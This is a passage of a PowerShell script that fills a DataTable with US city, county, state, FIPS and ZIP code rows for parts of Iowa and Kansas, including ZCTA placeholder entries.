$Cities.Rows.Add("Muscatine","Muscatine","Iowa","IA","19","52761") + $null = $Cities.Rows.Add("New liberty","Scott","Iowa","IA","19","52765") + $null = $Cities.Rows.Add("Nichols","Muscatine","Iowa","IA","19","52766") + $null = $Cities.Rows.Add("Pleasant valley","Scott","Iowa","IA","19","52767") + $null = $Cities.Rows.Add("Princeton","Scott","Iowa","IA","19","52768") + $null = $Cities.Rows.Add("Stockton","Muscatine","Iowa","IA","19","52769") + $null = $Cities.Rows.Add("Tipton","Cedar","Iowa","IA","19","52772") + $null = $Cities.Rows.Add("Walcott","Scott","Iowa","IA","19","52773") + $null = $Cities.Rows.Add("Welton","Clinton","Iowa","IA","19","52774") + $null = $Cities.Rows.Add("West liberty","Muscatine","Iowa","IA","19","52776") + $null = $Cities.Rows.Add("Wheatland","Clinton","Iowa","IA","19","52777") + $null = $Cities.Rows.Add("Wilton","Muscatine","Iowa","IA","19","52778") + $null = $Cities.Rows.Add("Zcta 527hh","Cedar","Iowa","IA","19","527HH") + $null = $Cities.Rows.Add("Davenport","Scott","Iowa","IA","19","52801") + $null = $Cities.Rows.Add("Davenport","Scott","Iowa","IA","19","52802") + $null = $Cities.Rows.Add("Davenport","Scott","Iowa","IA","19","52803") + $null = $Cities.Rows.Add("Davenport","Scott","Iowa","IA","19","52804") + $null = $Cities.Rows.Add("Davenport","Scott","Iowa","IA","19","52806") + $null = $Cities.Rows.Add("Davenport","Scott","Iowa","IA","19","52807") + $null = $Cities.Rows.Add("Zcta 528hh","Scott","Iowa","IA","19","528HH") + $null = $Cities.Rows.Add("","Winneshiek","Iowa","IA","19","55954") + $null = $Cities.Rows.Add("","Kossuth","Iowa","IA","19","56027") + $null = $Cities.Rows.Add("","Lyon","Iowa","IA","19","56129") + $null = $Cities.Rows.Add("Atchison","Atchison","Kansas","KS","20","66002") + $null = $Cities.Rows.Add("Baldwin city","Douglas","Kansas","KS","20","66006") + $null = $Cities.Rows.Add("Basehor","Leavenworth","Kansas","KS","20","66007") + $null = $Cities.Rows.Add("Bendena","Doniphan","Kansas","KS","20","66008") + $null = $Cities.Rows.Add("Blue mound","Linn","Kansas","KS","20","66010") + $null = $Cities.Rows.Add("Lake of the fore","Wyandotte","Kansas","KS","20","66012") + $null = $Cities.Rows.Add("Bucyrus","Miami","Kansas","KS","20","66013") + $null = $Cities.Rows.Add("Centerville","Linn","Kansas","KS","20","66014") + $null = $Cities.Rows.Add("Colony","Anderson","Kansas","KS","20","66015") + $null = $Cities.Rows.Add("Cummings","Atchison","Kansas","KS","20","66016") + $null = $Cities.Rows.Add("Denton","Doniphan","Kansas","KS","20","66017") + $null = $Cities.Rows.Add("De soto","Johnson","Kansas","KS","20","66018") + $null = $Cities.Rows.Add("Clearview city","Johnson","Kansas","KS","20","66019") + $null = $Cities.Rows.Add("Easton","Leavenworth","Kansas","KS","20","66020") + $null = $Cities.Rows.Add("Edgerton","Johnson","Kansas","KS","20","66021") + $null = $Cities.Rows.Add("Effingham","Atchison","Kansas","KS","20","66023") + $null = $Cities.Rows.Add("Elwood","Doniphan","Kansas","KS","20","66024") + $null = $Cities.Rows.Add("Eudora","Douglas","Kansas","KS","20","66025") + $null = $Cities.Rows.Add("Fontana","Miami","Kansas","KS","20","66026") + $null = $Cities.Rows.Add("Fort leavenworth","Leavenworth","Kansas","KS","20","66027") + $null = $Cities.Rows.Add("Gardner","Johnson","Kansas","KS","20","66030") + $null = $Cities.Rows.Add("Garnett","Anderson","Kansas","KS","20","66032") + $null = $Cities.Rows.Add("Greeley","Anderson","Kansas","KS","20","66033") + $null = $Cities.Rows.Add("Highland","Doniphan","Kansas","KS","20","66035") + $null = $Cities.Rows.Add("Mildred","Anderson","Kansas","KS","20","66039") + $null = $Cities.Rows.Add("La cygne","Linn","Kansas","KS","20","66040") + $null = $Cities.Rows.Add("Huron","Atchison","Kansas","KS","20","66041") + $null = $Cities.Rows.Add("Lane","Franklin","Kansas","KS","20","66042") + $null = $Cities.Rows.Add("Lansing","Leavenworth","Kansas","KS","20","66043") + $null = $Cities.Rows.Add("Lawrence","Douglas","Kansas","KS","20","66044") + $null = $Cities.Rows.Add("Lawrence","Douglas","Kansas","KS","20","66046") + $null = $Cities.Rows.Add("Lawrence","Douglas","Kansas","KS","20","66047") + $null = $Cities.Rows.Add("Leavenworth","Leavenworth","Kansas","KS","20","66048") + $null = $Cities.Rows.Add("Lawrence","Douglas","Kansas","KS","20","66049") + $null = $Cities.Rows.Add("Lecompton","Douglas","Kansas","KS","20","66050") + $null = $Cities.Rows.Add("Linwood","Leavenworth","Kansas","KS","20","66052") + $null = $Cities.Rows.Add("Louisburg","Miami","Kansas","KS","20","66053") + $null = $Cities.Rows.Add("Mc louth","Jefferson","Kansas","KS","20","66054") + $null = $Cities.Rows.Add("Mound city","Linn","Kansas","KS","20","66056") + $null = $Cities.Rows.Add("Muscotah","Atchison","Kansas","KS","20","66058") + $null = $Cities.Rows.Add("Nortonville","Jefferson","Kansas","KS","20","66060") + $null = $Cities.Rows.Add("Olathe","Johnson","Kansas","KS","20","66061") + $null = $Cities.Rows.Add("Olathe","Johnson","Kansas","KS","20","66062") + $null = $Cities.Rows.Add("Osawatomie","Miami","Kansas","KS","20","66064") + $null = $Cities.Rows.Add("Oskaloosa","Jefferson","Kansas","KS","20","66066") + $null = $Cities.Rows.Add("Ottawa","Franklin","Kansas","KS","20","66067") + $null = $Cities.Rows.Add("Ozawkie","Jefferson","Kansas","KS","20","66070") + $null = $Cities.Rows.Add("Paola","Miami","Kansas","KS","20","66071") + $null = $Cities.Rows.Add("Parker","Linn","Kansas","KS","20","66072") + $null = $Cities.Rows.Add("Perry","Jefferson","Kansas","KS","20","66073") + $null = $Cities.Rows.Add("Pleasanton","Linn","Kansas","KS","20","66075") + $null = $Cities.Rows.Add("Pomona","Franklin","Kansas","KS","20","66076") + $null = $Cities.Rows.Add("Potter","Atchison","Kansas","KS","20","66077") + $null = $Cities.Rows.Add("Princeton","Franklin","Kansas","KS","20","66078") + $null = $Cities.Rows.Add("Rantoul","Franklin","Kansas","KS","20","66079") + $null = $Cities.Rows.Add("Richmond","Franklin","Kansas","KS","20","66080") + $null = $Cities.Rows.Add("Spring hill","Johnson","Kansas","KS","20","66083") + $null = $Cities.Rows.Add("Stilwell","Johnson","Kansas","KS","20","66085") + $null = $Cities.Rows.Add("Tonganoxie","Leavenworth","Kansas","KS","20","66086") + $null = $Cities.Rows.Add("Severance","Doniphan","Kansas","KS","20","66087") + $null = $Cities.Rows.Add("Valley falls","Jefferson","Kansas","KS","20","66088") + $null = $Cities.Rows.Add("Wathena","Doniphan","Kansas","KS","20","66090") + $null = $Cities.Rows.Add("Welda","Anderson","Kansas","KS","20","66091") + $null = $Cities.Rows.Add("Wellsville","Franklin","Kansas","KS","20","66092") + $null = $Cities.Rows.Add("Westphalia","Anderson","Kansas","KS","20","66093") + $null = $Cities.Rows.Add("White cloud","Doniphan","Kansas","KS","20","66094") + $null = $Cities.Rows.Add("Williamsburg","Franklin","Kansas","KS","20","66095") + $null = $Cities.Rows.Add("Winchester","Jefferson","Kansas","KS","20","66097") + $null = $Cities.Rows.Add("Zcta 660hh","Doniphan","Kansas","KS","20","660HH") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66101") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66102") + $null = $Cities.Rows.Add("Rosedale","Wyandotte","Kansas","KS","20","66103") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66104") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66105") + $null = $Cities.Rows.Add("Lake quivira","Wyandotte","Kansas","KS","20","66106") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66109") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66111") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66112") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66115") + $null = $Cities.Rows.Add("Kansas city","Wyandotte","Kansas","KS","20","66118") + $null = $Cities.Rows.Add("Zcta 661hh","Wyandotte","Kansas","KS","20","661HH") + $null = $Cities.Rows.Add("Countryside","Johnson","Kansas","KS","20","66202") + $null = $Cities.Rows.Add("Shawnee","Johnson","Kansas","KS","20","66203") + $null = $Cities.Rows.Add("Overland park","Johnson","Kansas","KS","20","66204") + $null = $Cities.Rows.Add("Mission","Johnson","Kansas","KS","20","66205") + $null = $Cities.Rows.Add("Leawood","Johnson","Kansas","KS","20","66206") + $null = $Cities.Rows.Add("Shawnee mission","Johnson","Kansas","KS","20","66207") + $null = $Cities.Rows.Add("Prairie village","Johnson","Kansas","KS","20","66208") + $null = $Cities.Rows.Add("Leawood","Johnson","Kansas","KS","20","66209") + $null = $Cities.Rows.Add("Lenexa","Johnson","Kansas","KS","20","66210") + $null = $Cities.Rows.Add("Leawood","Johnson","Kansas","KS","20","66211") + $null = $Cities.Rows.Add("Overland park","Johnson","Kansas","KS","20","66212") + $null = $Cities.Rows.Add("Overland park","Johnson","Kansas","KS","20","66213") + $null = $Cities.Rows.Add("Lenexa","Johnson","Kansas","KS","20","66214") + $null = $Cities.Rows.Add("Lenexa","Johnson","Kansas","KS","20","66215") + $null = $Cities.Rows.Add("Shawnee","Johnson","Kansas","KS","20","66216") + $null = $Cities.Rows.Add("Shawnee","Johnson","Kansas","KS","20","66217") + $null = $Cities.Rows.Add("Shawnee","Johnson","Kansas","KS","20","66218") + $null = $Cities.Rows.Add("Lenexa","Johnson","Kansas","KS","20","66219") + $null = $Cities.Rows.Add("Lenexa","Johnson","Kansas","KS","20","66220") + $null = $Cities.Rows.Add("Stanley","Johnson","Kansas","KS","20","66221") + $null = $Cities.Rows.Add("Stanley","Johnson","Kansas","KS","20","66223") + $null = $Cities.Rows.Add("Stanley","Johnson","Kansas","KS","20","66224") + $null = $Cities.Rows.Add("Shawnee","Johnson","Kansas","KS","20","66226") + $null = $Cities.Rows.Add("Lenexa","Johnson","Kansas","KS","20","66227") + $null = $Cities.Rows.Add("Zcta 662hh","Johnson","Kansas","KS","20","662HH") + $null = $Cities.Rows.Add("Alma","Wabaunsee","Kansas","KS","20","66401") + $null = $Cities.Rows.Add("Auburn","Shawnee","Kansas","KS","20","66402") + $null = $Cities.Rows.Add("Axtell","Marshall","Kansas","KS","20","66403") + $null = $Cities.Rows.Add("Baileyville","Nemaha","Kansas","KS","20","66404") + $null = $Cities.Rows.Add("Beattie","Marshall","Kansas","KS","20","66406") + $null = $Cities.Rows.Add("Belvue","Pottawatomie","Kansas","KS","20","66407") + $null = $Cities.Rows.Add("Bern","Nemaha","Kansas","KS","20","66408") + $null = $Cities.Rows.Add("Berryton","Shawnee","Kansas","KS","20","66409") + $null = $Cities.Rows.Add("Blue rapids","Marshall","Kansas","KS","20","66411") + $null = $Cities.Rows.Add("Bremen","Marshall","Kansas","KS","20","66412") + $null = $Cities.Rows.Add("Burlingame","Osage","Kansas","KS","20","66413") + $null = $Cities.Rows.Add("Carbondale","Osage","Kansas","KS","20","66414") + $null = $Cities.Rows.Add("Centralia","Nemaha","Kansas","KS","20","66415") + $null = $Cities.Rows.Add("Circleville","Jackson","Kansas","KS","20","66416") + $null = $Cities.Rows.Add("Corning","Nemaha","Kansas","KS","20","66417") + $null = $Cities.Rows.Add("Delia","Jackson","Kansas","KS","20","66418") + $null = $Cities.Rows.Add("Denison","Jackson","Kansas","KS","20","66419") + $null = $Cities.Rows.Add("Emmett","Pottawatomie","Kansas","KS","20","66422") + $null = $Cities.Rows.Add("Eskridge","Wabaunsee","Kansas","KS","20","66423") + $null = $Cities.Rows.Add("Everest","Brown","Kansas","KS","20","66424") + $null = $Cities.Rows.Add("Fairview","Brown","Kansas","KS","20","66425") + $null = $Cities.Rows.Add("Winifred","Marshall","Kansas","KS","20","66427") + $null = $Cities.Rows.Add("Goff","Nemaha","Kansas","KS","20","66428") + $null = $Cities.Rows.Add("Grantville","Jefferson","Kansas","KS","20","66429") + $null = $Cities.Rows.Add("Harveyville","Wabaunsee","Kansas","KS","20","66431") + $null = $Cities.Rows.Add("Havensville","Pottawatomie","Kansas","KS","20","66432") + $null = $Cities.Rows.Add("Reserve","Brown","Kansas","KS","20","66434") + $null = $Cities.Rows.Add("Holton","Jackson","Kansas","KS","20","66436") + $null = $Cities.Rows.Add("Home","Marshall","Kansas","KS","20","66438") + $null = $Cities.Rows.Add("Horton","Brown","Kansas","KS","20","66439") + $null = $Cities.Rows.Add("Hoyt","Jackson","Kansas","KS","20","66440") + $null = $Cities.Rows.Add("Junction city","Geary","Kansas","KS","20","66441") + $null = $Cities.Rows.Add("Fort riley","Riley","Kansas","KS","20","66442") + $null = $Cities.Rows.Add("Leonardville","Riley","Kansas","KS","20","66449") + $null = $Cities.Rows.Add("Louisville","Pottawatomie","Kansas","KS","20","66450") + $null = $Cities.Rows.Add("Lyndon","Osage","Kansas","KS","20","66451") + $null = $Cities.Rows.Add("Zcta 664hh","Geary","Kansas","KS","20","664HH") + $null = $Cities.Rows.Add("Zcta 664xx","Riley","Kansas","KS","20","664XX") + $null = $Cities.Rows.Add("Mc farland","Wabaunsee","Kansas","KS","20","66501") + $null = $Cities.Rows.Add("Manhattan","Riley","Kansas","KS","20","66502") + $null = $Cities.Rows.Add("Manhattan","Riley","Kansas","KS","20","66503") + $null = $Cities.Rows.Add("Manhattan","Riley","Kansas","KS","20","66506") + $null = $Cities.Rows.Add("Maple hill","Wabaunsee","Kansas","KS","20","66507") + $null = $Cities.Rows.Add("Marysville","Marshall","Kansas","KS","20","66508") + $null = $Cities.Rows.Add("Mayetta","Jackson","Kansas","KS","20","66509") + $null = $Cities.Rows.Add("Melvern","Osage","Kansas","KS","20","66510") + $null = $Cities.Rows.Add("Meriden","Jefferson","Kansas","KS","20","66512") + $null = $Cities.Rows.Add("Milford","Geary","Kansas","KS","20","66514") + $null = $Cities.Rows.Add("Morrill","Brown","Kansas","KS","20","66515") + $null = $Cities.Rows.Add("Netawaka","Jackson","Kansas","KS","20","66516") + $null = $Cities.Rows.Add("Ogden","Riley","Kansas","KS","20","66517") + $null = $Cities.Rows.Add("Oketo","Marshall","Kansas","KS","20","66518") + $null = $Cities.Rows.Add("Olsburg","Pottawatomie","Kansas","KS","20","66520") + $null = $Cities.Rows.Add("Duluth","Pottawatomie","Kansas","KS","20","66521") + $null = $Cities.Rows.Add("Oneida","Nemaha","Kansas","KS","20","66522") + $null = $Cities.Rows.Add("Osage city","Osage","Kansas","KS","20","66523") + $null = $Cities.Rows.Add("Overbrook","Osage","Kansas","KS","20","66524") + $null = $Cities.Rows.Add("Paxico","Wabaunsee","Kansas","KS","20","66526") + $null = $Cities.Rows.Add("Powhattan","Brown","Kansas","KS","20","66527") + $null = $Cities.Rows.Add("Quenemo","Osage","Kansas","KS","20","66528") + $null = $Cities.Rows.Add("Riley","Riley","Kansas","KS","20","66531") + $null = $Cities.Rows.Add("Leona","Brown","Kansas","KS","20","66532") + $null = $Cities.Rows.Add("Rossville","Shawnee","Kansas","KS","20","66533") + $null = $Cities.Rows.Add("Sabetha","Nemaha","Kansas","KS","20","66534") + $null = $Cities.Rows.Add("Saint george","Pottawatomie","Kansas","KS","20","66535") + $null = $Cities.Rows.Add("Saint marys","Pottawatomie","Kansas","KS","20","66536") + $null = $Cities.Rows.Add("Scranton","Osage","Kansas","KS","20","66537") + $null = $Cities.Rows.Add("Kelly","Nemaha","Kansas","KS","20","66538") + $null = $Cities.Rows.Add("Silver lake","Shawnee","Kansas","KS","20","66539") + $null = $Cities.Rows.Add("Soldier","Jackson","Kansas","KS","20","66540") + $null = $Cities.Rows.Add("Summerfield","Marshall","Kansas","KS","20","66541") + $null = $Cities.Rows.Add("Tecumseh","Shawnee","Kansas","KS","20","66542") + $null = $Cities.Rows.Add("Vassar","Osage","Kansas","KS","20","66543") + $null = $Cities.Rows.Add("Vliets","Marshall","Kansas","KS","20","66544") + $null = $Cities.Rows.Add("Wakarusa","Shawnee","Kansas","KS","20","66546") + $null = $Cities.Rows.Add("Wamego","Pottawatomie","Kansas","KS","20","66547") + $null = $Cities.Rows.Add("Waterville","Marshall","Kansas","KS","20","66548") + $null = $Cities.Rows.Add("Blaine","Pottawatomie","Kansas","KS","20","66549") + $null = $Cities.Rows.Add("Wetmore","Nemaha","Kansas","KS","20","66550") + $null = $Cities.Rows.Add("Whiting","Jackson","Kansas","KS","20","66552") + $null = $Cities.Rows.Add("Randolph","Riley","Kansas","KS","20","66554") + $null = $Cities.Rows.Add("Zcta 665hh","Douglas","Kansas","KS","20","665HH") + $null = $Cities.Rows.Add("Zcta 665xx","Riley","Kansas","KS","20","665XX") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66603") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66604") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66605") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66606") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66607") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66608") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66609") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66610") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66611") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66612") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66614") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66615") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66616") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66617") + $null = $Cities.Rows.Add("Topeka","Shawnee","Kansas","KS","20","66618") + $null = $Cities.Rows.Add("Pauline","Shawnee","Kansas","KS","20","66619") + $null = $Cities.Rows.Add("Zcta 666hh","Shawnee","Kansas","KS","20","666HH") + $null = $Cities.Rows.Add("Hiattville","Bourbon","Kansas","KS","20","66701") + $null = $Cities.Rows.Add("Altoona","Wilson","Kansas","KS","20","66710") + $null = $Cities.Rows.Add("Arcadia","Crawford","Kansas","KS","20","66711") + $null = $Cities.Rows.Add("Arma","Crawford","Kansas","KS","20","66712") + $null = $Cities.Rows.Add("Baxter springs","Cherokee","Kansas","KS","20","66713") + $null = $Cities.Rows.Add("Benedict","Wilson","Kansas","KS","20","66714") + $null = $Cities.Rows.Add("Bronson","Bourbon","Kansas","KS","20","66716") + $null = $Cities.Rows.Add("Buffalo","Wilson","Kansas","KS","20","66717") + $null = $Cities.Rows.Add("Chanute","Neosho","Kansas","KS","20","66720") + $null = $Cities.Rows.Add("Cherokee","Crawford","Kansas","KS","20","66724") + $null = $Cities.Rows.Add("Hallowell","Cherokee","Kansas","KS","20","66725") + $null = $Cities.Rows.Add("Elsmore","Allen","Kansas","KS","20","66732") + $null = $Cities.Rows.Add("Erie","Neosho","Kansas","KS","20","66733") + $null = $Cities.Rows.Add("Farlington","Crawford","Kansas","KS","20","66734") + $null = $Cities.Rows.Add("Franklin","Crawford","Kansas","KS","20","66735") + $null = $Cities.Rows.Add("Lafontaine","Wilson","Kansas","KS","20","66736") + $null = $Cities.Rows.Add("Fulton","Bourbon","Kansas","KS","20","66738") + $null = $Cities.Rows.Add("Galena","Cherokee","Kansas","KS","20","66739") + $null = $Cities.Rows.Add("Galesburg","Neosho","Kansas","KS","20","66740") + $null = $Cities.Rows.Add("Garland","Bourbon","Kansas","KS","20","66741") + $null = $Cities.Rows.Add("Girard","Crawford","Kansas","KS","20","66743") + $null = $Cities.Rows.Add("Hepler","Crawford","Kansas","KS","20","66746") + $null = $Cities.Rows.Add("Humboldt","Allen","Kansas","KS","20","66748") + $null = $Cities.Rows.Add("Carlyle","Allen","Kansas","KS","20","66749") + $null = $Cities.Rows.Add("La harpe","Allen","Kansas","KS","20","66751") + $null = $Cities.Rows.Add("Mc cune","Crawford","Kansas","KS","20","66753") + $null = $Cities.Rows.Add("Mapleton","Bourbon","Kansas","KS","20","66754") + $null = $Cities.Rows.Add("Moran","Allen","Kansas","KS","20","66755") + $null = $Cities.Rows.Add("Mulberry","Crawford","Kansas","KS","20","66756") + $null = $Cities.Rows.Add("Neodesha","Wilson","Kansas","KS","20","66757") + $null = $Cities.Rows.Add("Neosho falls","Woodson","Kansas","KS","20","66758") + $null = $Cities.Rows.Add("New albany","Wilson","Kansas","KS","20","66759") + $null = $Cities.Rows.Add("Opolis","Crawford","Kansas","KS","20","66760") + $null = $Cities.Rows.Add("Piqua","Woodson","Kansas","KS","20","66761") + $null = $Cities.Rows.Add("Radley","Crawford","Kansas","KS","20","66762") + $null = $Cities.Rows.Add("Frontenac","Crawford","Kansas","KS","20","66763") + $null = $Cities.Rows.Add("Prescott","Linn","Kansas","KS","20","66767") + $null = $Cities.Rows.Add("Redfield","Bourbon","Kansas","KS","20","66769") + $null = $Cities.Rows.Add("Riverton","Cherokee","Kansas","KS","20","66770") + $null = $Cities.Rows.Add("Saint paul","Neosho","Kansas","KS","20","66771") + $null = $Cities.Rows.Add("Savonburg","Allen","Kansas","KS","20","66772") + $null = $Cities.Rows.Add("Carona","Cherokee","Kansas","KS","20","66773") + $null = $Cities.Rows.Add("Stark","Neosho","Kansas","KS","20","66775") + $null = $Cities.Rows.Add("Thayer","Neosho","Kansas","KS","20","66776") + $null = $Cities.Rows.Add("Toronto","Woodson","Kansas","KS","20","66777") + $null = $Cities.Rows.Add("Treece","Cherokee","Kansas","KS","20","66778") + $null = $Cities.Rows.Add("Uniontown","Bourbon","Kansas","KS","20","66779") + $null = $Cities.Rows.Add("Walnut","Crawford","Kansas","KS","20","66780") + $null = $Cities.Rows.Add("Lawton","Cherokee","Kansas","KS","20","66781") + $null = $Cities.Rows.Add("West mineral","Cherokee","Kansas","KS","20","66782") + $null = $Cities.Rows.Add("Yates center","Woodson","Kansas","KS","20","66783") + $null = $Cities.Rows.Add("Zcta 667hh","Allen","Kansas","KS","20","667HH") + $null = $Cities.Rows.Add("Emporia","Lyon","Kansas","KS","20","66801") + $null = $Cities.Rows.Add("Admire","Lyon","Kansas","KS","20","66830") + $null = $Cities.Rows.Add("Bushong","Lyon","Kansas","KS","20","66833") + $null = $Cities.Rows.Add("Alta vista","Wabaunsee","Kansas","KS","20","66834") + $null = $Cities.Rows.Add("Americus","Lyon","Kansas","KS","20","66835") + $null = $Cities.Rows.Add("Burdick","Morris","Kansas","KS","20","66838") + $null = $Cities.Rows.Add("Strawn","Coffey","Kansas","KS","20","66839") + $null = $Cities.Rows.Add("Burns","Butler","Kansas","KS","20","66840") + $null = $Cities.Rows.Add("Cassoday","Butler","Kansas","KS","20","66842") + $null = $Cities.Rows.Add("Clements","Chase","Kansas","KS","20","66843") + $null = $Cities.Rows.Add("Cottonwood falls","Chase","Kansas","KS","20","66845") + $null = $Cities.Rows.Add("Dunlap","Morris","Kansas","KS","20","66846") + $null = $Cities.Rows.Add("Dwight","Morris","Kansas","KS","20","66849") + $null = $Cities.Rows.Add("Elmdale","Chase","Kansas","KS","20","66850") + $null = $Cities.Rows.Add("Florence","Marion","Kansas","KS","20","66851") + $null = $Cities.Rows.Add("Gridley","Coffey","Kansas","KS","20","66852") + $null = $Cities.Rows.Add("Hamilton","Greenwood","Kansas","KS","20","66853") + $null = $Cities.Rows.Add("Hartford","Lyon","Kansas","KS","20","66854") + $null = $Cities.Rows.Add("Lebo","Coffey","Kansas","KS","20","66856") + $null = $Cities.Rows.Add("Le roy","Coffey","Kansas","KS","20","66857") + $null = $Cities.Rows.Add("Antelope","Marion","Kansas","KS","20","66858") + $null = $Cities.Rows.Add("Lost springs","Marion","Kansas","KS","20","66859") + $null = $Cities.Rows.Add("Madison","Greenwood","Kansas","KS","20","66860") + $null = $Cities.Rows.Add("Marion","Marion","Kansas","KS","20","66861") + $null = $Cities.Rows.Add("Matfield green","Chase","Kansas","KS","20","66862") + $null = $Cities.Rows.Add("Neal","Greenwood","Kansas","KS","20","66863") + $null = $Cities.Rows.Add("Neosho rapids","Lyon","Kansas","KS","20","66864") + $null = $Cities.Rows.Add("Olpe","Lyon","Kansas","KS","20","66865") + $null = $Cities.Rows.Add("Peabody","Marion","Kansas","KS","20","66866") + $null = $Cities.Rows.Add("Reading","Lyon","Kansas","KS","20","66868") + $null = $Cities.Rows.Add("Strong city","Chase","Kansas","KS","20","66869") + $null = $Cities.Rows.Add("Virgil","Greenwood","Kansas","KS","20","66870") + $null = $Cities.Rows.Add("Waverly","Coffey","Kansas","KS","20","66871") + $null = $Cities.Rows.Add("White city","Morris","Kansas","KS","20","66872") + $null = $Cities.Rows.Add("Zcta 668hh","Chase","Kansas","KS","20","668HH") + $null = $Cities.Rows.Add("Rice","Cloud","Kansas","KS","20","66901") + $null = $Cities.Rows.Add("Agenda","Republic","Kansas","KS","20","66930") + $null = $Cities.Rows.Add("Athol","Smith","Kansas","KS","20","66932") + $null = $Cities.Rows.Add("Barnes","Washington","Kansas","KS","20","66933") + $null = $Cities.Rows.Add("Belleville","Republic","Kansas","KS","20","66935") + $null = $Cities.Rows.Add("Burr oak","Jewell","Kansas","KS","20","66936") + $null = $Cities.Rows.Add("Clifton","Washington","Kansas","KS","20","66937") + $null = $Cities.Rows.Add("Clyde","Cloud","Kansas","KS","20","66938") + $null = $Cities.Rows.Add("Courtland","Republic","Kansas","KS","20","66939") + $null = $Cities.Rows.Add("Cuba","Republic","Kansas","KS","20","66940") + $null = $Cities.Rows.Add("Esbon","Jewell","Kansas","KS","20","66941") + $null = $Cities.Rows.Add("Formoso","Jewell","Kansas","KS","20","66942") + $null = $Cities.Rows.Add("Greenleaf","Washington","Kansas","KS","20","66943") + $null = $Cities.Rows.Add("Haddam","Washington","Kansas","KS","20","66944") + $null = $Cities.Rows.Add("Hanover","Washington","Kansas","KS","20","66945") + $null = $Cities.Rows.Add("Hollenberg","Washington","Kansas","KS","20","66946") + $null = $Cities.Rows.Add("Jamestown","Cloud","Kansas","KS","20","66948") + $null = $Cities.Rows.Add("Ionia","Jewell","Kansas","KS","20","66949") + $null = $Cities.Rows.Add("Kensington","Smith","Kansas","KS","20","66951") + $null = $Cities.Rows.Add("Bellaire","Smith","Kansas","KS","20","66952") + $null = $Cities.Rows.Add("Linn","Washington","Kansas","KS","20","66953") + $null = $Cities.Rows.Add("Mahaska","Washington","Kansas","KS","20","66955") + $null = $Cities.Rows.Add("Mankato","Jewell","Kansas","KS","20","66956") + $null = $Cities.Rows.Add("Morrowville","Washington","Kansas","KS","20","66958") + $null = $Cities.Rows.Add("Munden","Republic","Kansas","KS","20","66959") + $null = $Cities.Rows.Add("Narka","Republic","Kansas","KS","20","66960") + $null = $Cities.Rows.Add("Palmer","Washington","Kansas","KS","20","66962") + $null = $Cities.Rows.Add("Randall","Jewell","Kansas","KS","20","66963") + $null = $Cities.Rows.Add("Republic","Republic","Kansas","KS","20","66964") + $null = $Cities.Rows.Add("Scandia","Republic","Kansas","KS","20","66966") + $null = $Cities.Rows.Add("Smith center","Smith","Kansas","KS","20","66967") + $null = $Cities.Rows.Add("Washington","Washington","Kansas","KS","20","66968") + $null = $Cities.Rows.Add("Webber","Jewell","Kansas","KS","20","66970") + $null = $Cities.Rows.Add("Zcta 669hh","Clay","Kansas","KS","20","669HH") + $null = $Cities.Rows.Add("Zcta 669xx","Smith","Kansas","KS","20","669XX") + $null = $Cities.Rows.Add("Andale","Sedgwick","Kansas","KS","20","67001") + $null = $Cities.Rows.Add("Andover","Butler","Kansas","KS","20","67002") + $null = $Cities.Rows.Add("Anthony","Harper","Kansas","KS","20","67003") + $null = $Cities.Rows.Add("Argonia","Sumner","Kansas","KS","20","67004") + $null = $Cities.Rows.Add("Arkansas city","Cowley","Kansas","KS","20","67005") + $null = $Cities.Rows.Add("Atlanta","Cowley","Kansas","KS","20","67008") + $null = $Cities.Rows.Add("Attica","Harper","Kansas","KS","20","67009") + $null = $Cities.Rows.Add("Augusta","Butler","Kansas","KS","20","67010") + $null = $Cities.Rows.Add("Beaumont","Butler","Kansas","KS","20","67012") + $null = $Cities.Rows.Add("Belle plaine","Sumner","Kansas","KS","20","67013") + $null = $Cities.Rows.Add("Bentley","Sedgwick","Kansas","KS","20","67016") + $null = $Cities.Rows.Add("Benton","Butler","Kansas","KS","20","67017") + $null = $Cities.Rows.Add("Bluff city","Harper","Kansas","KS","20","67018") + $null = $Cities.Rows.Add("Burden","Cowley","Kansas","KS","20","67019") + $null = $Cities.Rows.Add("Burrton","Harvey","Kansas","KS","20","67020") + $null = $Cities.Rows.Add("Byers","Pratt","Kansas","KS","20","67021") + $null = $Cities.Rows.Add("Caldwell","Sumner","Kansas","KS","20","67022") + $null = $Cities.Rows.Add("Cambridge","Cowley","Kansas","KS","20","67023") + $null = $Cities.Rows.Add("Cedar vale","Chautauqua","Kansas","KS","20","67024") + $null = $Cities.Rows.Add("Cheney","Sedgwick","Kansas","KS","20","67025") + $null = $Cities.Rows.Add("Clearwater","Sedgwick","Kansas","KS","20","67026") + $null = $Cities.Rows.Add("Coats","Pratt","Kansas","KS","20","67028") + $null = $Cities.Rows.Add("Coldwater","Comanche","Kansas","KS","20","67029") + $null = $Cities.Rows.Add("Colwich","Sedgwick","Kansas","KS","20","67030") + $null = $Cities.Rows.Add("Conway springs","Sumner","Kansas","KS","20","67031") + $null = $Cities.Rows.Add("Penalosa","Kingman","Kansas","KS","20","67035") + $null = $Cities.Rows.Add("Danville","Harper","Kansas","KS","20","67036") + $null = 